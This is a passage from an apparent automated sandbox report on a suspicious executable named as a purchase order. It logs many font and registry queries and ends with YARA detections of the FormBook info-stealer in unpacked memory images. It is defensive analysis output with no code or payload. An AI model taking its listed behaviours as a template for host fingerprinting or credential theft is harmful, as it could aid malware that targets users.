          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
          Source: C:\Users\user\Desktop\PO#12108997.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 4.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
